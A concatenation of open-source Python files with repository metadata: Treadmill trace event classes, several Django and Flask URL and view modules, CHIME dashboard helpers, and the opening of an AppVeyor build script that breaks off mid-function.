    """Event emitted when a container instance is deleted from the scheduler.
    """
    __slots__ = ()
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        # Deletion carries no extra data; event_data is ignored.
        assert cls == getattr(AppTraceEventTypes, event_type).value
        return cls(timestamp=timestamp, source=source,
                   instanceid=instanceid, payload=payload)
    @property
    def event_data(self):
        # Nothing to serialize for deletions.
        return None
class FinishedTraceEvent(AppTraceEvent):
    """Event emitted when a container instance finished.
    """
    __slots__ = (
        'rc',
        'signal',
    )
    def __init__(self, rc, signal,
                 timestamp=None, source=None, instanceid=None, payload=None):
        super(FinishedTraceEvent, self).__init__(
            timestamp=timestamp, source=source,
            instanceid=instanceid, payload=payload)
        # Exit code and signal are normalized to ints.
        self.rc = int(rc)
        self.signal = int(signal)
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        assert cls == getattr(AppTraceEventTypes, event_type).value
        # event_data is '<rc>.<signal>'.
        rc, signal = event_data.split('.', 2)
        return cls(timestamp=timestamp, source=source, instanceid=instanceid,
                   payload=payload, rc=rc, signal=signal)
    @property
    def event_data(self):
        return '{0}.{1}'.format(self.rc, self.signal)
class AbortedTraceEvent(AppTraceEvent):
    """Event emitted when a container instance was aborted.
    """
    __slots__ = ('why',)
    def __init__(self, why,
                 timestamp=None, source=None, instanceid=None, payload=None):
        super(AbortedTraceEvent, self).__init__(
            timestamp=timestamp, source=source,
            instanceid=instanceid, payload=payload)
        self.why = why
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        assert cls == getattr(AppTraceEventTypes, event_type).value
        # The raw event_data is the free-form abort reason.
        return cls(timestamp=timestamp, source=source, instanceid=instanceid,
                   payload=payload, why=event_data)
    @property
    def event_data(self):
        return self.why
class KilledTraceEvent(AppTraceEvent):
    """Event emitted when a container instance was killed.
    """
    __slots__ = ('is_oom',)
    def __init__(self, is_oom,
                 timestamp=None, source=None, instanceid=None, payload=None):
        super(KilledTraceEvent, self).__init__(
            timestamp=timestamp, source=source,
            instanceid=instanceid, payload=payload)
        self.is_oom = is_oom
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        assert cls == getattr(AppTraceEventTypes, event_type).value
        # 'oom' marks an out-of-memory kill; anything else is a plain kill.
        return cls(timestamp=timestamp, source=source, instanceid=instanceid,
                   payload=payload, is_oom=(event_data == 'oom'))
    @property
    def event_data(self):
        return 'oom' if self.is_oom else ''
class ServiceRunningTraceEvent(AppTraceEvent):
    """Event emitted when a service of container instance started.
    """
    __slots__ = (
        'uniqueid',
        'service',
    )
    def __init__(self, uniqueid, service,
                 timestamp=None, source=None, instanceid=None, payload=None):
        super(ServiceRunningTraceEvent, self).__init__(
            timestamp=timestamp, source=source,
            instanceid=instanceid, payload=payload)
        self.uniqueid = uniqueid
        self.service = service
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        assert cls == getattr(AppTraceEventTypes, event_type).value
        # event_data is '<uniqueid>.<service>'; the service name itself may
        # contain dots, so only the first dot separates the two fields.
        uniqueid, _sep, service = event_data.partition('.')
        return cls(timestamp=timestamp, source=source, instanceid=instanceid,
                   payload=payload, uniqueid=uniqueid, service=service)
    @property
    def event_data(self):
        return '{0}.{1}'.format(self.uniqueid, self.service)
class ServiceExitedTraceEvent(AppTraceEvent):
    """Event emitted when a service of container instance exited.
    """
    __slots__ = (
        'uniqueid',
        'service',
        'rc',
        'signal',
    )
    def __init__(self, uniqueid, service, rc, signal,
                 timestamp=None, source=None, instanceid=None, payload=None):
        super(ServiceExitedTraceEvent, self).__init__(
            timestamp=timestamp, source=source,
            instanceid=instanceid, payload=payload)
        self.uniqueid = uniqueid
        self.service = service
        self.rc = int(rc)
        self.signal = int(signal)
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        assert cls == getattr(AppTraceEventTypes, event_type).value
        # event_data is '<uniqueid>.<service>.<rc>.<signal>'. The service
        # name may itself contain dots: peel uniqueid off the front and
        # rc/signal off the back; whatever remains is the service.
        tokens = event_data.split('.')
        uniqueid = tokens.pop(0)
        signal = tokens.pop()
        rc = tokens.pop()
        service = '.'.join(tokens)
        return cls(timestamp=timestamp, source=source, instanceid=instanceid,
                   payload=payload, uniqueid=uniqueid, service=service,
                   rc=rc, signal=signal)
    @property
    def event_data(self):
        return '{0}.{1}.{2}.{3}'.format(
            self.uniqueid, self.service, self.rc, self.signal)
class AppTraceEventTypes(enum.Enum):
    """Enumeration of all app event type names.
    Member names are the wire-format `event_type` strings; member values are
    the concrete event classes. That pairing is what lets
    AppTraceEventTypes(cls).name recover a name and
    getattr(AppTraceEventTypes, name).value recover a class.
    """
    aborted = AbortedTraceEvent
    configured = ConfiguredTraceEvent
    deleted = DeletedTraceEvent
    finished = FinishedTraceEvent
    killed = KilledTraceEvent
    pending = PendingTraceEvent
    pending_delete = PendingDeleteTraceEvent
    scheduled = ScheduledTraceEvent
    service_exited = ServiceExitedTraceEvent
    service_running = ServiceRunningTraceEvent
class AppTraceEventHandler(_events.TraceEventHandler):
    """Base class for processing app trace events.
    Subclasses implement the abstract ``on_*`` callbacks; ``dispatch`` maps
    a parsed event object to the adapter that unpacks its attributes into
    the matching callback.
    """
    # Maps each concrete event class to an adapter lambda that forwards the
    # event's attributes to the corresponding on_* callback.
    DISPATCH = {
        ScheduledTraceEvent:
            lambda self, event: self.on_scheduled(
                when=event.timestamp,
                instanceid=event.instanceid,
                server=event.where,
                why=event.why
            ),
        PendingTraceEvent:
            lambda self, event: self.on_pending(
                when=event.timestamp,
                instanceid=event.instanceid,
                why=event.why
            ),
        PendingDeleteTraceEvent:
            lambda self, event: self.on_pending_delete(
                when=event.timestamp,
                instanceid=event.instanceid,
                why=event.why
            ),
        DeletedTraceEvent:
            lambda self, event: self.on_deleted(
                when=event.timestamp,
                instanceid=event.instanceid
            ),
        ConfiguredTraceEvent:
            lambda self, event: self.on_configured(
                when=event.timestamp,
                instanceid=event.instanceid,
                server=event.source,
                uniqueid=event.uniqueid
            ),
        FinishedTraceEvent:
            lambda self, event: self.on_finished(
                when=event.timestamp,
                instanceid=event.instanceid,
                server=event.source,
                exitcode=event.rc,
                signal=event.signal
            ),
        AbortedTraceEvent:
            lambda self, event: self.on_aborted(
                when=event.timestamp,
                instanceid=event.instanceid,
                server=event.source,
                why=event.why
            ),
        KilledTraceEvent:
            lambda self, event: self.on_killed(
                when=event.timestamp,
                instanceid=event.instanceid,
                server=event.source,
                is_oom=event.is_oom
            ),
        ServiceRunningTraceEvent:
            lambda self, event: self.on_service_running(
                when=event.timestamp,
                instanceid=event.instanceid,
                server=event.source,
                uniqueid=event.uniqueid,
                service=event.service
            ),
        ServiceExitedTraceEvent:
            lambda self, event: self.on_service_exited(
                when=event.timestamp,
                instanceid=event.instanceid,
                server=event.source,
                uniqueid=event.uniqueid,
                service=event.service,
                exitcode=event.rc,
                signal=event.signal
            ),
    }
    def dispatch(self, event):
        """Dispatch event to one of the handler methods.
        Returns the adapter callable for the event's class, or None when no
        adapter is registered for that class.
        """
        return self.DISPATCH.get(type(event), None)
    @abc.abstractmethod
    def on_scheduled(self, when, instanceid, server, why):
        """Invoked when task is scheduled.
        """
    @abc.abstractmethod
    def on_pending(self, when, instanceid, why):
        """Invoked when task is pending.
        """
    @abc.abstractmethod
    def on_pending_delete(self, when, instanceid, why):
        """Invoked when task is about to be deleted.
        """
    @abc.abstractmethod
    def on_configured(self, when, instanceid, server, uniqueid):
        """Invoked when task is configured.
        """
    @abc.abstractmethod
    def on_deleted(self, when, instanceid):
        """Invoked when task is deleted.
        """
    @abc.abstractmethod
    def on_finished(self, when, instanceid, server, signal, exitcode):
        """Invoked when task is finished.
        """
    @abc.abstractmethod
    def on_aborted(self, when, instanceid, server, why):
        """Invoked when task is aborted.
        """
    @abc.abstractmethod
    def on_killed(self, when, instanceid, server, is_oom):
        """Invoked when task is killed (is_oom flags an OOM kill).
        """
    @abc.abstractmethod
    def on_service_running(self, when, instanceid, server, uniqueid, service):
        """Invoked when service is running.
        """
    @abc.abstractmethod
    def on_service_exited(self, when, instanceid, server, uniqueid, service,
                          exitcode, signal):
        """Invoked when service exits.
        """
| {
"repo_name": "Morgan-Stanley/treadmill",
"path": "lib/python/treadmill/trace/app/events.py",
"copies": "2",
"size": "18675",
"license": "apache-2.0",
"hash": 5909132291452893000,
"line_mean": 26.9565868263,
"line_max": 79,
"alpha_frac": 0.5544846051,
"autogenerated": false,
"ratio": 4.468772433596555,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6023257038696554,
"avg_score": null,
"num_lines": null
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from rest_framework import routers
from qs import views
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'groups', views.GroupViewSet)
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
| {
"repo_name": "marcopuccio/pocs",
"path": "python/drf-gs/app/app/urls.py",
"copies": "1",
"size": "1073",
"license": "mit",
"hash": -2749578524721797600,
"line_mean": 33.6129032258,
"line_max": 82,
"alpha_frac": 0.7110904007,
"autogenerated": false,
"ratio": 3.5296052631578947,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47406956638578945,
"avg_score": null,
"num_lines": null
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from api import views
from rest_framework import routers
router = routers.DefaultRouter()
# router.register(r'users', views.UserViewSet)
# router.register(r'groups', views.GroupViewSet)
router.register(r'locales', views.LocalViewSet)
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
| {
"repo_name": "Hackatong2017Geriatricos/backend",
"path": "app/urls.py",
"copies": "1",
"size": "1127",
"license": "apache-2.0",
"hash": -7068995877040204000,
"line_mean": 33.1515151515,
"line_max": 82,
"alpha_frac": 0.7125110914,
"autogenerated": false,
"ratio": 3.521875,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9581045456131654,
"avg_score": 0.03066812705366922,
"num_lines": 33
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.staticfiles import views
from django.conf import settings
from .views import index
from .views import user
from .views import u
from .views import root
from .views import activity
from .views import scenery
from .views import strategy
from .views import siderbar
from .views import test
urlpatterns = [
url(r'^$', index.index, name="index"),
url(r'^activity/$', activity.getAllActivities, name="all-activities"),
url(r'^activity/add/$', activity.addActivity, name="addActivity"),
url(r'^activity/(?P<activity_id>[0-9]+)/$', activity.getActivityInfo, name="activity-info"),
url(r'^activity/join/$', activity.joinActivity, name="activity-join"),
url(r'^activity/s/$', activity.searchActivity, name="activity-search"),
url(r'^scenery/$', scenery.getAllScenery, name="all-scenery"),
url(r'^scenery/(?P<scenery_id>[0-9]+)/$', scenery.getSceneryInfo, name="scenery-info"),
url(r'^scenery/search/(?P<fuzzyQueryWord>\w+)/$', scenery.getFuzzySearchScenerys, name="getFuzzySearchScenerys"),
url(r'^scenery/s/$', scenery.searchScenery, name="scenery-search"),
url(r'^strategy/$', strategy.getAllStrategy, name="all-strategy"),
url(r'^strategy/(?P<strategy_id>[0-9]+)/$', strategy.getOneStrategy, name="one-strategy"),
url(r'^reg/$', user.register, name="register"),
url(r'^login/$', user.login, name="login"),
url(r'^logout/$', user.logout, name="logout"),
url(r'^u/reset-password/$', u.resetPassword, name="reset-password"),
url(r'^u/update/$', u.updateProfile, name="update profile"),
url(r'^u/post/$', u.postStrategy, name="post journal"),
url(r'^u/slmanage/$', root.getslider, name="getslider"),
url(r'^u/slmanage/add/$', root.addslider, name="addslider"),
#url(r'^u/slmanage/update/$', root.updateslider, name="updateslider"),
url(r'^u/slmanage/delete/$', root.deleteslider, name="deleteslider"),
url(r'^u/acmanage/$', root.getactivity, name="getactivity"),
url(r'^u/scmanage/$', root.getscenery, name="getscenery"),
url(r'^u/jomanage/$', root.getstrategy, name="getjournal"),
url(r'^u/usmanage/$', root.getuser, name="getuser"),
# url(r'^u/(?P<username>\w+)/$', u.getUserProfile, name="user-profile"),
url(r'^u/$', u.getProfile, name="get profile"),
url(r'^u/activity/$', u.getPersonActivities),
url(r'^u/post/list/$', strategy.getPostedStrategy, name="get all strategy"),
url(r'^siderbar/activity/$', siderbar.activity),
url(r'^siderbar/popular/activity/$', siderbar.popular_activity),
url(r'^siderbar/popular/scenery/$', siderbar.popular_scenery),
url(r'^siderbar/popular/strategy/$', siderbar.popular_strategy),
url(r'^test/', test.test, name="test")
]
urlpatterns += [
url(r'^static/(?P<path>.*)$', views.static.serve, {'document_root': settings.STATIC_ROOT}, name="static"),
url(r'^media/(?P<path>.*)$', views.static.serve, {'document_root': settings.MEDIA_ROOT}, name="media")
]
| {
"repo_name": "October-66/Traveler-Pal",
"path": "traveler_pal/app/urls.py",
"copies": "1",
"size": "3651",
"license": "mit",
"hash": -3892179055834035000,
"line_mean": 41.9529411765,
"line_max": 117,
"alpha_frac": 0.6778964667,
"autogenerated": false,
"ratio": 3.2598214285714286,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4437717895271429,
"avg_score": null,
"num_lines": null
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls import url, include, patterns
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic.base import TemplateView
from rest_framework import routers
from backend import views
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'tags', views.TagViewSet)
router.register(r'entries', views.EntryViewSet)
router.register(r'favorites', views.FavoriteViewSet)
router.register(r'settings', views.SettingViewSet)
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='home.html'), name='home'),
url(r'^web/$', TemplateView.as_view(template_name=settings.WEB_ROOT+'/index.html')),
url(r'^sign-up/', views.sign_up, name="sign-up"),
url(r'^qq-login', views.qq_login, name="qq-login"),
url(r'^admin/', admin.site.urls),
url(r'^api/', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^api-token-auth/', 'rest_framework_jwt.views.obtain_jwt_token'),
url(r'^api-token-refresh/', 'rest_framework_jwt.views.refresh_jwt_token'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT
) + static(settings.WEB_URL, document_root=settings.WEB_ROOT)
| {
"repo_name": "tonnie17/Bookmarker",
"path": "bookmarker/bookmarker/urls.py",
"copies": "1",
"size": "1989",
"license": "mit",
"hash": 8771301216892135000,
"line_mean": 44.2045454545,
"line_max": 88,
"alpha_frac": 0.7239819005,
"autogenerated": false,
"ratio": 3.3769100169779285,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9594733380846867,
"avg_score": 0.001231707326212149,
"num_lines": 44
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from . import views
app_name = 'app'
urlpatterns = [
# Home:
path('', views.home, name='home'),
# Add:
path('add/', views.add_memo, name='add_memo'),
# Edit:
path('edit/<int:id>/', views.edit_memo, name='edit_memo'),
# Delete:
path('delete/<int:id>/', views.delete_memo, name='delete_memo'),
# Refresh:
path('refresh/', views.refresh_memo, name='refresh_memo'),
]
| {
"repo_name": "y-tsutsu/mondja",
"path": "app/urls.py",
"copies": "1",
"size": "1066",
"license": "bsd-3-clause",
"hash": 704016649391363000,
"line_mean": 28.6111111111,
"line_max": 77,
"alpha_frac": 0.6547842402,
"autogenerated": false,
"ratio": 3.4498381877022655,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9604622427902265,
"avg_score": 0,
"num_lines": 36
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from baton.autodiscover import admin
from django.urls import path, include, re_path
from django.conf import settings
from django.views import static
from django.contrib.staticfiles.views import serve
from app.views import admin_search
from news.views import news_change_view
urlpatterns = [
path('admin/doc/', include('django.contrib.admindocs.urls')),
path('admin/search/', admin_search),
# path('admin/newschange/<int:id>', news_change_view),
path('admin/', admin.site.urls),
path('baton/', include('baton.urls')),
path('tinymce/', include('tinymce.urls')),
]
if settings.DEBUG:
urlpatterns += [
re_path(r'^media/(?P<path>.*)$', static.serve,
{'document_root': settings.MEDIA_ROOT}),
]
urlpatterns += [
re_path(r'^static/(?P<path>.*)$', serve),
]
| {
"repo_name": "otto-torino/django-baton",
"path": "testapp/app/app/urls.py",
"copies": "1",
"size": "1450",
"license": "mit",
"hash": 6651242364689964000,
"line_mean": 35.25,
"line_max": 77,
"alpha_frac": 0.6772413793,
"autogenerated": false,
"ratio": 3.6340852130325816,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48113265923325815,
"avg_score": null,
"num_lines": null
} |
#app/urls.py
# NOTE(review): the url/patterns/include imports below are repeated, and the
# two `views` imports shadow each other (the later `from app import views`
# wins) -- worth deduplicating.
from django.conf.urls import url
from django.conf.urls import patterns, include
from . import views
from app import views
from django.conf.urls import url, patterns, include
#from app.api import UsuarioResource
#usuario_resource=UsuarioResource()
#from .views import RegistrarUsuario, RedirigirUsuario
urlpatterns = [
    #url(r'^admin', views.libros, name='libros'),
    url(r'^$', views.index, name='index'),
    url(r'^app/$', views.index, name='base'),
    url(r'^index/$', views.index, name='index'),
    url(r'^about/$',views.about,name='about'),
    url(r'^login/$',views.login,name='login'),
    url(r'^registro/$',views.registro,name='registro'),
    url(r'^logout/$',views.logout,name='logout'),
    url(r'^addbar/$',views.addbar,name='addbar'),
    url(r'^bar/(?P<category_name_slug>[\w\-]+)/$',views.bar,name='bar'),
    url(r'^bar/(?P<bar_name_url>[\w\-]+)/add_tapa/$', views.add_tapa, name='add_tapa'),
    url(r'^reclama_bares/$',views.reclama_bares,name='reclama_bares'),
    url(r'^reclama_visitas/$',views.reclama_visitas,name='reclama_visitas')
] | {
"repo_name": "bogdananas/proyectoIV-modulo2",
"path": "app/urls.py",
"copies": "1",
"size": "1085",
"license": "mit",
"hash": -4481251202425780000,
"line_mean": 34.0322580645,
"line_max": 87,
"alpha_frac": 0.666359447,
"autogenerated": false,
"ratio": 2.9324324324324325,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.40987918794324324,
"avg_score": null,
"num_lines": null
} |
# app/users/views.py
#################### Imports ####################
from flask import render_template, Blueprint, request, redirect, url_for, flash
from sqlalchemy.exc import IntegrityError
from .forms import RegisterForm
from app import db
from app.models import User
#################### Config ####################
users_blueprint = Blueprint('users', __name__, template_folder='templates')
#################### Routes ####################
@users_blueprint.route('/login')
def login():
    """Render the login form template."""
    return render_template('login.html')
@users_blueprint.route('/register', methods=['GET', 'POST'])
def register():
    """Handle new-user registration.

    GET renders the registration form; a valid POST creates the user and
    redirects to the blog index. A duplicate email raises IntegrityError,
    which is rolled back and reported via a flash message, falling through
    to re-render the form.
    """
    form = RegisterForm(request.form)
    if request.method == 'POST':
        if form.validate_on_submit():
            try:
                new_user = User(form.username.data, form.first_name.data, form.last_name.data, form.email.data, form.password.data)
                # Marked authenticated immediately -- presumably consumed by
                # the login machinery; confirm against the User model.
                new_user.authenticated = True
                db.session.add(new_user)
                db.session.commit()
                flash('Thank you for registering!', 'success')
                return redirect(url_for('blog.index'))
            except IntegrityError:
                # Unique-constraint violation (duplicate email): undo insert.
                db.session.rollback()
                flash('ERROR! Email ({}) already exists.'.format(form.email.data), 'error')
    return render_template('register.html', form=form)
| {
"repo_name": "weldon0405/weldon-blog",
"path": "app/users/views.py",
"copies": "1",
"size": "1340",
"license": "mit",
"hash": 1541331423795959000,
"line_mean": 32.5,
"line_max": 131,
"alpha_frac": 0.5805970149,
"autogenerated": false,
"ratio": 4.2271293375394325,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0036591571378762093,
"num_lines": 40
} |
"""app/utils
utils
The helper classes and functions here exist to reduce large repetitive code
blocks throughout the project. They may contain functions or classes from
module but do not change the parameters of the class
Modules
-------
templates utilities for localization templates
"""
from itertools import repeat
from json import dumps, loads
from collections import Mapping
from datetime import date, datetime
from typing import Any, List
from urllib.parse import quote
from dateutil.parser import parse as parse_date
from pandas import DataFrame
from chime_dash.app.services.plotting import plot_dataframe
from chime_dash.app.utils.templates import df_to_html_table
from penn_chime.model.parameters import Parameters, Disposition
from penn_chime.constants import DATE_FORMAT
from penn_chime.view.charts import build_table
class ReadOnlyDict(Mapping):
    """Read-only ``Mapping`` facade over an existing dict.

    Every lookup is delegated to the wrapped mapping; no mutating
    operations are exposed.
    """
    def __init__(self, data):
        # Keeps a reference only -- the view reflects later changes to data.
        self._wrapped = data
    def __getitem__(self, key):
        return self._wrapped[key]
    def __iter__(self):
        return iter(self._wrapped)
    def __len__(self):
        return len(self._wrapped)
    def keys(self):
        return self._wrapped.keys()
def _parameters_serializer_helper(obj):
    """JSON fallback encoder: dates/datetimes become ISO-format strings,
    any other object is serialized through its ``__dict__``.
    """
    if isinstance(obj, (datetime, date)):
        return obj.isoformat()
    return obj.__dict__
# TODO: handle versioning? We don't currently persist Dash state, but we may.
def parameters_serializer(p: Parameters):
    """Serialize a ``Parameters`` instance to a deterministic JSON string
    (keys sorted, non-primitive values handled by the helper above).
    """
    return dumps(p, default=_parameters_serializer_helper, sort_keys=True)
def parameters_deserializer(p_json: str):
    """Inverse of parameters_serializer: rebuild a Parameters instance from
    its JSON representation."""
    values = loads(p_json)

    def as_date(key):
        # Date fields are stored as ISO strings (or None).
        raw = values[key]
        return parse_date(raw).date() if raw else None

    def as_disposition(key):
        # Dispositions are stored as [days, rate] pairs.
        pair = values[key]
        return Disposition.create(days=pair[0], rate=pair[1])

    return Parameters(
        current_date=as_date("current_date"),
        current_hospitalized=values["current_hospitalized"],
        hospitalized=as_disposition("hospitalized"),
        icu=as_disposition("icu"),
        infectious_days=values["infectious_days"],
        date_first_hospitalized=as_date("date_first_hospitalized"),
        doubling_time=values["doubling_time"],
        market_share=values["market_share"],
        mitigation_date=as_date("mitigation_date"),
        n_days=values["n_days"],
        population=values["population"],
        recovered=values["recovered"],
        region=values["region"],
        relative_contact_rate=values["relative_contact_rate"],
        ventilated=as_disposition("ventilated"),
    )
def build_csv_download(df):
    """Encode *df* as a percent-escaped ``data:`` URI suitable for a CSV
    download link."""
    csv_text = df.to_csv(index=True, encoding="utf-8")
    return "data:text/csv;charset=utf-8," + quote(csv_text)
def get_n_switch_values(input_value, elements_to_update) -> List[bool]:
    """Return ``input_value`` repeated ``elements_to_update`` times."""
    return [input_value] * elements_to_update
def prepare_visualization_group(df: DataFrame = None, **kwargs) -> List[Any]:
    """Creates plot, table and download link for data frame.

    Arguments:
        df: The Dataframe to plot
        content: Dict[str, str]
            Mapping for translating columns and index.
        labels: List[str]
            Columns to display
        table_mod: int
            Displays only each `table_mod` row in table

    Returns:
        ``[plot_data, table, csv]`` on success; the fallback
        ``[{}, None, None]`` when ``df`` is missing or not a DataFrame.
    """
    result = [{}, None, None]
    if df is not None and isinstance(df, DataFrame):
        date_column = "date"
        day_column = "day"
        # Translate column and index if specified
        content = kwargs.get("content", None)
        if content:
            columns = {col: content[col] for col in df.columns if col in content}
            index = (
                {df.index.name: content[df.index.name]}
                if df.index.name and df.index.name in content
                else None
            )
            df = df.rename(columns=columns, index=index)
            # Track the (possibly translated) names of the two key columns.
            date_column = content.get(date_column, date_column)
            day_column = content.get(day_column, day_column)
        # Plot is indexed by date; the day counter column is dropped.
        plot_data = plot_dataframe(
            df.dropna().set_index(date_column).drop(columns=[day_column])
        )
        # translate back for backwards compability of build_table
        column_map = {day_column: "day", date_column: "date"}
        table = (
            df_to_html_table(
                build_table(
                    df=df.rename(columns=column_map),
                    labels=kwargs.get("labels", df.columns),
                    modulo=kwargs.get("table_mod", 7),
                ),
                formats={
                    float: int,
                    (date, datetime): lambda d: d.strftime(DATE_FORMAT),
                },
            )
            # if kwargs.get("show_tables", None)
            # else None
        )
        # Convert columnnames to lowercase
        column_map = {col: col.lower() for col in df.columns}
        csv = build_csv_download(df.rename(columns=column_map))
        result = [plot_data, table, csv]
    return result
def singleton(class_):
    """Decorator factory: cache and reuse a single instance of ``class_``.

    The first call's arguments construct the instance; later calls ignore
    their arguments and return the cached instance.
    """
    instances = {}

    def get_instance(*args, **kwargs):
        try:
            return instances[class_]
        except KeyError:
            instances[class_] = class_(*args, **kwargs)
            return instances[class_]

    return get_instance
| {
"repo_name": "CodeForPhilly/chime",
"path": "src/chime_dash/app/utils/__init__.py",
"copies": "1",
"size": "5511",
"license": "mit",
"hash": 8063376096094657000,
"line_mean": 29.4254143646,
"line_max": 86,
"alpha_frac": 0.6039585981,
"autogenerated": false,
"ratio": 3.94201861130995,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.504597720940995,
"avg_score": null,
"num_lines": null
} |
"""AppVeyor Build
This file is used to build and distribute the safety binary on appveyor. Take
a look at the corresponding appveyor.yml as well.
"""
import os
import subprocess
import sys
from collections import OrderedDict
class environment:
    """Platform abstraction for the AppVeyor build matrix.

    Maps the APPVEYOR_BUILD_WORKER_IMAGE environment variable to one of
    win/linux/macos and drives the install/test/dist actions for every
    (architecture, python binary) pair of the current platform.
    """
    WIN = "win"
    LINUX = "linux"
    MACOS = "macos"

    def __init__(self):
        # APPVEYOR_BUILD_WORKER_IMAGE is set by AppVeyor; an unknown image
        # raises KeyError here, failing fast.
        os_mapping = {
            "Visual Studio 2019": self.WIN,
            "Ubuntu": self.LINUX,
            "macOS": self.MACOS
        }
        self.os = os_mapping[os.getenv("APPVEYOR_BUILD_WORKER_IMAGE")]

    @property
    def python(self):
        # Yields (architecture, python executable) pairs for this platform.
        for arch, python in self.PYTHON_BINARIES[self.os].items():
            yield arch, python

    # NOTE: os.getcwd() in the 32-bit linux entry is evaluated once, at
    # class-definition (import) time.
    PYTHON_BINARIES = {
        WIN: {
            64: "C:\\Python38-x64\\python.exe",
            32: "C:\\Python38\\python.exe",
        },
        # Order is important. If the 32 bit release gets built first,
        # you'll run into permission problems due to docker clobbering
        # up the current working directory.
        LINUX: OrderedDict([
            (64, "python"),
            (32, f"docker run -t -v {os.getcwd()}:/app 32-bit-linux python3"),
        ]),
        MACOS: {
            # Trying to use Python 3 compatible with PyInstaller according
            # https://www.appveyor.com/docs/macos-images-software/#python
            64: "~/venv3.8/bin/python",
        }
    }

    def run(self, command):
        """Runs the given command via subprocess.check_output.

        Exits with -1 if the command wasn't successful.
        """
        try:
            print(f"RUNNING: {command}")
            print("-" * 80)
            print(subprocess.check_output(command, shell=True).decode('utf-8'))
        except subprocess.CalledProcessError as e:
            print(f"ERROR calling '{command}'")
            print("-" * 20)
            # e.output may be None; the `and` guards the decode.
            print(e.output and e.output.decode('utf-8'))
            sys.exit(-1)

    def install(self):
        """
        Install required dependencies
        """
        # special case:
        # - build the 32 bit binary for linux on docker
